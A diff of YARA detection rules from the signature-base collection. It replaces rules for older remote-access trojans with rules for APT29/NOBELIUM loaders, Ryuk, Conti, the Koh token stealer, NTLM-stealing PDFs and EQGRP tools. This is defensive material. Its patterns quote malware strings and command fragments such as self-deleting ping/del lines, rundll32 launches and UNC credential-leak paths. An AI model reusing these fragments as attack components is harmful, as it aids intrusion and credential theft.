+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L236-L252"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e70e3e0885d098f1ac2bcc324cd8ad2682fbfc395f189cabc4a4f97a0109682"
+		logic_hash = "18a52f5fd71455b8564d4b485c233dd358a304bfddc5e6fb604b8e5a2a1949a3"
 		score = 75
-		quality = 60
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 85
+		tags = "FILE"
+		hash1 = "292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8"
+		hash2 = "776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b"
 
 	strings:
-		$a = "SMARTLOGS" wide
-		$b = "RUNPE" wide
-		$c = "b.Resources" wide
-		$d = "CLIENTINFO*" wide
-		$e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide
-		$f = "Proactive Anti-Malware has been manually activated!" wide
-		$g = "REMOVEGUARD" wide
-		$h = "C0n1f8" wide
-		$i = "Luminosity" wide
-		$j = "LuminosityCryptoMiner" wide
-		$k = "MANAGER*CLIENTDETAILS*" wide
+		$op1 = { 48 03 c8 42 0f b6 04 21 88 03 0f b6 43 01 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
+		$op2 = { 48 03 c8 42 0f b6 04 21 88 43 01 41 0f b6 c7 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
+		$op3 = { 45 0f b6 43 ff 41 8b c2 99 44 88 03 41 0f b6 2b 83 e2 03 03 c2 40 88 6b 01 }
 
 	condition:
-		all of them
+		filesize < 2200KB and all of them
 }
-rule SIGNATURE_BASE_RAT_Luxnet
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Stageless_Loader_May21_2 : FILE
 {
 	meta:
-		description = "Detects LuxNet RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "277db509-5ba0-5d1b-b17a-d5914f1f1650"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/LuxNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L495-L516"
+		description = "Detects stageless loader as used by APT29 / NOBELIUM"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7b83d327-52fc-5401-ae35-00f6b825678a"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L254-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "55d872e2e30f6d55a6f91750bbb52675042e4673d712a4f2417af43b0f2c4fb9"
+		logic_hash = "850f6a1ad342fd5e4bb29c7bf90a032ddd8ac9d2eac5ffcbedf43e4d04b178f5"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf"
+		hash2 = "c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78"
 
 	strings:
-		$a = "GetHashCode"
-		$b = "Activator"
-		$c = "WebClient"
-		$d = "op_Equality"
-		$e = "dickcursor.cur" wide
-		$f = "{0}|{1}|{2}" wide
+		$x1 = "DLL_stageless.dll" ascii fullword
+		$s1 = "c:\\users\\devuser\\documents" ascii fullword nocase
+		$s2 = "VisualServiceComponent" ascii fullword
+		$s3 = "CheckUpdteFrameJavaCurrentVersion" ascii fullword
+		$op1 = { a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 }
+		$op2 = { ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 e8 d4 00 10 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of them or 3 of them
 }
-rule SIGNATURE_BASE_RAT_Netwire
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_3 : FILE
 {
 	meta:
-		description = "Detects NetWire RAT"
-		author = "Kevin Breen <kevin@techanarchy.net> & David Cannings"
-		id = "f0077e8c-3e6a-5a98-9171-b0d81f24d27a"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/NetWire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L547-L569"
+		description = "Detects malware used by APT29 / NOBELIUM"
+		author = "Florian Roth (Nextron Systems)"
+		id = "89cb6884-4242-5b5a-b0ac-b31041dd261c"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L278-L300"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6a4e757262c02dfe46ac28940b53a5695df2d242ccd4c16b42fbfdcf96072e91"
+		logic_hash = "472acd1d6daf3480de59ecd3fa038d644e339dcc979cf7e56617eadc6cb32dc5"
 		score = 75
-		quality = 60
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 85
+		tags = "FILE"
+		hash1 = "2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e"
 
 	strings:
-		$exe1 = "%.2d-%.2d-%.4d"
-		$exe2 = "%s%.2d-%.2d-%.4d"
-		$exe3 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
-		$exe4 = "wcnwClass"
-		$exe5 = "[Ctrl+%c]"
-		$exe6 = "SYSTEM\\CurrentControlSet\\Control\\ProductOptions"
-		$exe7 = "%s\\.purple\\accounts.xml"
+		$s1 = "Win32Project1.dll" ascii fullword
+		$op1 = { 59 c3 6a 08 68 70 5e 01 10 e8 d2 8c ff ff 8b 7d 08 8b c7 c1 f8 05 }
+		$op2 = { 8d 4d f0 e8 c4 12 00 00 68 64 5b 01 10 8d 45 f0 c7 45 f0 6c 01 01 10 50 e8 ea 13 00 00 cc }
+		$op4 = { 40 c3 8b 65 e8 e8 a6 86 ff ff cc 6a 0c 68 88 60 01 10 e8 b0 4d ff ff }
+		$xc1 = { 25 73 25 73 00 00 00 00 2F 65 2C 20 00 00 00 00
+               43 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00
+               77 00 73 00 5C 00 65 00 78 00 70 00 6C 00 6F 00
+               72 00 65 00 72 00 2E 00 65 00 78 00 65 }
 
 	condition:
-		all of them
+		filesize < 3000KB and ( $xc1 or 3 of them )
 }
-rule SIGNATURE_BASE_RAT_Pandora
+rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_4 : FILE
 {
 	meta:
-		description = "Detects Pandora RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "d31e4366-8911-5c9c-92dc-a99f5233c626"
-		date = "2014-01-04"
-		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Pandora"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L571-L599"
+		description = "Detects malware used by APT29 / NOBELIUM"
+		author = "Florian Roth (Nextron Systems)"
+		id = "56193475-52b4-5720-abc5-72249e2a0c37"
+		date = "2021-05-29"
+		modified = "2025-03-21"
+		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_nobelium_may21.yar#L302-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d33598d0699bfb7e996047318099302c2c326e45d993a259c2bc145acf8cf54b"
+		logic_hash = "7d5858cc6dab094d5dceab75a2002d9145537008241a08ac7bd399c9d6e6c270"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
 
 	strings:
-		$a = "Can't get the Windows version"
-		$b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}="
-		$c = "JPEG error #%d" wide
-		$d = "Cannot assign a %s to a %s" wide
-		$g = "%s, ProgID:"
-		$h = "clave"
-		$i = "Shell_TrayWnd"
-		$j = "melt.bat"
-		$k = "\\StubPath"
-		$l = "\\logs.dat"
-		$m = "1027|Operation has been canceled!"
-		$n = "466|You need to plug-in! Double click to install... |"
-		$0 = "33|[Keylogger Not Activated!]"
+		$s1 = "KM.FileSystem.dll" ascii fullword
+		$op1 = { 80 3d 50 6b 04 10 00 0f 85 96 00 00 00 33 c0 40 b9 48 6b 04 10 87 01 33 db 89 5d fc }
+		$op2 = { c3 33 c0 b9 7c 6f 04 10 40 87 01 c3 8b ff 55 }
+		$op3 = { 8d 4d f4 e8 53 ff ff ff 68 d0 22 01 10 8d 45 f4 50 e8 d8 05 00 00 cc 8b 41 04 }
+		$xc1 = { 2E 64 6C 6C 00 00 00 00 41 53 4B 4F 44 00 00 00
+               53 75 63 63 65 73 73 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( $xc1 or 3 of them )
 }
-rule SIGNATURE_BASE_RAT_Paradox
+
+rule SIGNATURE_BASE_MAL_Ryuk_Ransomware : FILE
 {
 	meta:
-		description = "Detects Paradox RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "2f1e6226-799b-54eb-a4a4-6c0f1bf561b4"
-		date = "2014-01-04"
+		description = "Detects strings known from Ryuk Ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "25d40631-4158-5d3d-913e-a2f1233489e0"
+		date = "2018-12-31"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Paradox"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L601-L623"
+		reference = "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ryuk_ransomware.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fef41262b78a497c65c7548c58d78ba8912725b28606fd9e99d1dbc19bdf7393"
+		logic_hash = "01e8ad348e5954374fc0f9fc25ba1ee83db4a2a50e622b27640aa2eb394dc5a0"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "965884f19026913b2c57b8cd4a86455a61383de01dabb69c557f45bb848f6c26"
+		hash2 = "b8fcd4a3902064907fb19e0da3ca7aed72a7e6d1f94d971d1ee7a4d3af6a800d"
 
 	strings:
-		$a = "ParadoxRAT"
-		$b = "Form1"
-		$c = "StartRMCam"
-		$d = "Flooders"
-		$e = "SlowLaris"
-		$f = "SHITEMID"
-		$g = "set_Remote_Chat"
+		$x1 = "/v \"svchos\" /f" fullword wide
+		$x2 = "\\Documents and Settings\\Default User\\finish" wide
+		$x3 = "\\users\\Public\\finish" wide
+		$x4 = "lsaas.exe" fullword wide
+		$x5 = "RyukReadMe.txt" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "4a069c1abe5aca148d5a8fdabc26751e" or pe.imphash ( ) == "dc5733c013378fa418d13773f5bfe6f1" or 1 of them )
 }
-rule SIGNATURE_BASE_RAT_Plasma
+rule SIGNATURE_BASE_HKTL_Koh_Tokenstealer : FILE
 {
 	meta:
-		description = "Detects Plasma RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "2a19c0de-0078-5487-869c-1bcabea57300"
-		date = "2014-01-04"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project."
+		author = "Will Schroeder (@harmj0y)"
+		id = "76b6cc9f-5db7-5e9b-939c-e713bad8137a"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Plasma"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L625-L649"
+		reference = "https://github.com/GhostPack/Koh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_hktl_koh_tokenstealer.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e73348d379c483a7917cf765a457739aed6940f180272fa8d0c0dd1eb8e5f562"
+		logic_hash = "e2c4d948e23f1a3a92689f35fedde6e041d09cd88deac9ff3249556be0b8f789"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
 
 	strings:
-		$a = "Miner: Failed to Inject." wide
-		$b = "Started GPU Mining on:" wide
-		$c = "BK: Hard Bot Killer Ran Successfully!" wide
-		$d = "Uploaded Keylogs Successfully!" wide
-		$e = "No Slowloris Attack is Running!" wide
-		$f = "An ARME Attack is Already Running on" wide
-		$g = "Proactive Bot Killer Enabled!" wide
-		$h = "PlasmaRAT" wide ascii
-		$i = "AntiEverything" wide ascii
+		$x_typelibguid = "4d5350c8-7f8c-47cf-8cde-c752018af17e" ascii
+		$s1 = "[*] Already SYSTEM, not elevating" wide fullword
+		$s2 = "S-1-[0-59]-\\d{2}-\\d{8,10}-\\d{8,10}-\\d{8,10}-[1-9]\\d{2}" wide
+		$s3 = "0x[0-9A-Fa-f]+$" wide
+		$s4 = "\\Koh.pdb" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_RAT_Poisonivy
+rule SIGNATURE_BASE_SUSP_Bad_PDF : FILE
 {
 	meta:
-		description = "Detects PoisonIvy RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "371686d3-878f-56fc-a702-ec49845f486b"
-		date = "2014-01-04"
+		description = "Detects PDF that embeds code to steal NTLM hashes"
+		author = "Florian Roth (Nextron Systems), Markus Neis"
+		id = "149cf20c-4cfd-5b07-acc5-06ae25b209b1"
+		date = "2018-05-03"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/PoisonIvy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L651-L672"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_bad_pdf.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "874e0dfb22a03abc0f7fdc7209ff13b55dfa5dcc17db944903ca37a549eb331d"
-		score = 75
+		logic_hash = "59b159aaccf5c3b64fee17831c1e3a1ca99b60dbb725ad25a4ddad47cdc442d7"
+		score = 65
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		hash1 = "d8c502da8a2b8d1c67cb5d61428f273e989424f319cfe805541304bdb7b921a8"
 
 	strings:
-		$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}
-		$string1 = "CONNECT %s:%i HTTP/1.0"
-		$string2 = "ws2_32"
-		$string3 = "cks=u"
-		$string4 = "thj@h"
-		$string5 = "advpack"
+		$s1 = "         /F (http//" ascii
+		$s2 = "        /F (\\\\\\\\" ascii
+		$s3 = "<</F (\\\\" ascii
 
 	condition:
-		$stub at 0x1620 and all of ( $string* ) or ( all of them )
+		( uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x4450250a ) and 1 of them
 }
-rule SIGNATURE_BASE_RAT_Predatorpain
+rule SIGNATURE_BASE_MAL_RANSOM_Conticrypter
 {
 	meta:
-		description = "Detects PredatorPain RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "c6670179-871d-5a57-983b-d77354e2ede9"
-		date = "2014-01-04"
+		description = "Signature for a crypter associated with Conti"
+		author = "James Quinn, Binary Defense"
+		id = "f2a00655-41a2-5614-9c29-3629c93c0e95"
+		date = "2021-03-17"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/PredatorPain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L674-L702"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_conti.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "917234f83f891ad00bd83908c244818f517ea89cf7d8c81cfc3618b8386c1804"
+		logic_hash = "256fbd028a91da45049e2e861e16e97201f09cb92ab049eda373c80e6a796726"
 		score = 75
 		quality = 85
 		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tlp = "White"
 
 	strings:
-		$string1 = "holderwb.txt" wide
-		$string3 = "There is a file attached to this email" wide
-		$string4 = "screens\\screenshot" wide
-		$string5 = "Disablelogger" wide
-		$string6 = "\\pidloc.txt" wide
-		$string7 = "clearie" wide
-		$string8 = "clearff" wide
-		$string9 = "emails should be sent to you shortly" wide
-		$string10 = "jagex_cache\\regPin" wide
-		$string11 = "open=Sys.exe" wide
-		$ver1 = "PredatorLogger" wide
-		$ver2 = "EncryptedCredentials" wide
-		$ver3 = "Predator Pain" wide
+		$handoff1 = {4C 8D 05 ?? ?? ?? ?? 48 C7 44 24 28 00 00 00 00 C7 44 24 20 00 00 00 00 e8}
+		$handoff2 = {C7 ?? 24 ?? 00 00 00 00 89 44 24 ?? C7 ?? 24 ?? ?? ?? ?? ?? C7 ?? 24 ?? 00 00 00 00 }
+		$garbageLoad1 = {53 48 83 EC 20 89 CB 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 01 D8 48 83 C4 20 5B C3}
+		$garbageLoad2 = {55 89 E5 83 EC 18 C7 ?? 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 45 08 52 C9 C3}
 
 	condition:
-		7 of ( $string* ) and any of ( $ver* )
+		1 of ( $handoff* ) and 1 of ( $garbageLoad* )
 }
-rule SIGNATURE_BASE_RAT_Punisher
+rule SIGNATURE_BASE_EQGRP_Noclient_3_0_5 : FILE
 {
 	meta:
-		description = "Detects Punisher RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "1e16b3c7-9656-5570-afa2-542367aa14d8"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3"
+		author = "Florian Roth (Nextron Systems)"
+		id = "af7472ce-0605-5f50-8180-23438d2196b8"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/Punisher"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L704-L726"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9347b8053393c3537693273c44a2a2f095928b8bc0cdcf9365a6f060d66efeb5"
+		logic_hash = "51a6bf03c8d034942bf02fae2bea52436f53b4d437006b1dbe9c0c67387fe17a"
 		score = 75
-		quality = 60
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "abccba"
-		$b = {5C 00 68 00 66 00 68 00 2E 00 76 00 62 00 73}
-		$c = {5C 00 73 00 63 00 2E 00 76 00 62 00 73}
-		$d = "SpyTheSpy" wide ascii
-		$e = "wireshark" wide
-		$f = "apateDNS" wide
-		$g = "abccbaDanabccb"
+		$x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii
+		$x2 = "Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo." fullword ascii
+		$x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
+		$x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii
+		$x5 = "ourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_RAT_Pythorat
+rule SIGNATURE_BASE_EQGRP_Installdate : FILE
 {
 	meta:
-		description = "Detects Python RAT"
-		author = "Kevin Breen <kevin@techanarchy.net>"
-		id = "fc98c513-1abf-5331-b351-f6182e5b19c5"
-		date = "2014-01-04"
+		description = "Detects tool from EQGRP toolset - file installdate.pl"
+		author = "Florian Roth (Nextron Systems)"
+		id = "029b1213-1206-5b7c-bd72-93239a23fe8a"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com/stats/PythoRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L728-L751"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L31-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8edcfb8f234ff225537d19343c75788ec2a25940e80042751eea3280a967e166"
+		logic_hash = "363a9c92c4d2560ba6dd0ec41acf136dff4346f20d54f971d319ed2aa531fe31"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "exe"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "TKeylogger"
-		$b = "uFileTransfer"
-		$c = "TTDownload"
-		$d = "SETTINGS"
-		$e = "Unknown" wide
-		$f = "#@#@#"
-		$g = "PluginData"
-		$i = "OnPluginMessage"
+		$x1 = "#Provide hex or EP log as command-line argument or as input" fullword ascii
+		$x2 = "print \"Gimme hex: \";" fullword ascii
+		$x3 = "if ($line =~ /Reg_Dword:  (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\S*)/) {" fullword ascii
+		$s1 = "if ($_ =~ /InstallDate/) {" fullword ascii
+		$s2 = "if (not($cmdInput)) {" fullword ascii
+		$s3 = "print \"$hex in decimal=$dec\\n\\n\";" fullword ascii
 
 	condition:
-		all of them
+		filesize < 2KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_RAT_Qrat
+rule SIGNATURE_BASE_EQGRP_Teflondoor : FILE
 {
 	meta:
-		description = "Detects QRAT"
-		author = "Kevin Breen @KevTheHermit"
-		id = "2ee645a3-1e01-513c-a636-098e445adeca"
-		date = "2015-01-08"
+		description = "Detects tool from EQGRP toolset - file teflondoor.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "188f9ef1-5524-50be-ac62-91cb9726b155"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://malwareconfig.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L753-L773"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L52-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d404153ca64b547885e4e4581205f5fc20faf86e8ab18002c5deedca2487225"
+		logic_hash = "38be3cfa638509d539bf4ada3b5c7e44e01ee4cfb74a53a76cd2f4287c5a56f5"
 		score = 75
 		quality = 85
-		tags = ""
-		maltype = "Remote Access Trojan"
-		filetype = "jar"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a0 = "e-data"
-		$a1 = "quaverse/crypter"
-		$a2 = "Qrypt.class"
-		$a3 = "Jarizer.class"
-		$a4 = "URLConnection.class"
+		$x1 = "%s: abort.  Code is %d.  Message is '%s'" fullword ascii
+		$x2 = "%s: %li b (%li%%)" fullword ascii
+		$s1 = "no winsock" fullword ascii
+		$s2 = "%s: %s file '%s'" fullword ascii
+		$s3 = "peer: connect" fullword ascii
+		$s4 = "read: write" fullword ascii
+		$s5 = "%s: done!" fullword ascii
+		$s6 = "%s: %li b" fullword ascii
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of ( $x* ) and 3 of them
 }
-rule SIGNATURE_BASE_RAT_Sakula : FILE
+rule SIGNATURE_BASE_EQGRP_Durablenapkin_Solaris_2_0_1 : FILE
 {
 	meta:
-		description = "Detects Sakula v1.0 RAT"
-		author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings"
-		id = "4be3179c-3b91-56db-bba9-9ccc42066f96"
-		date = "2015-10-13"
+		description = "Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7b49a26d-9ee3-5aff-93fc-509239daef28"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L775-L817"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L75-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec4e16deb6f4a671ee665c81568e87dc9a1023328e1be242eae015c1e04cfcef"
+		logic_hash = "113f9451d6792511baa168957c643de02f37826b32944ef882f49b68496ec596"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%d_of_%d_for_%s_on_%s"
-		$s2 = "/c ping 127.0.0.1 & del /q \"%s\""
-		$s3 = "=%s&type=%d"
-		$s4 = "?photoid="
-		$s5 = "iexplorer"
-		$s6 = "net start \"%s\""
-		$s7 = "cmd.exe /c rundll32 \"%s\""
-		$v1_1 = "MicroPlayerUpdate.exe"
-		$v1_2 = "CCPUpdate"
-		$v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }
-		$v1_4 = { 50 E8 CD FC FF FF 83 C4  04 68 E8 03 00 00 FF D7 56 E8 54 12 00 00 E9 AE  FE FF FF E8 13 F5 FF FF }
-		$serial01 = { 31 06 2e 48 3e 01 06 b1 8c 98 2f 00 53 18 5c 36 }
-		$serial02 = { 01 a5 d9 59 95 19 b1 ba fc fa d0 e8 0b 6d 67 35 }
-		$serial03 = { 47 d5 d5 37 2b cb 15 62 b4 c9 f4 c2 bd f1 35 87 }
-		$serial04 = { 3a c1 0e 68 f1 ce 51 9e 84 dd cd 28 b1 1f a5 42 }
-		$opcodes1 = { 89 FF 55 89 E5 83 EC 20 A1 ?? ?? ?? 00 83 F8 00 }
-		$opcodes2 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
-		$opcodes3 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
-		$opcodes4 = { 30 14 38 8D 0C 38 40 FE C2 3B C6 }
-		$opcodes5 = { 30 14 39 8D 04 39 41 FE C2 3B CE }
-		$fp1 = "Symantec Corporation" ascii wide
+		$s1 = "recv_ack: %s: Service not supplied by provider" fullword ascii
+		$s2 = "send_request: putmsg \"%s\": %s" fullword ascii
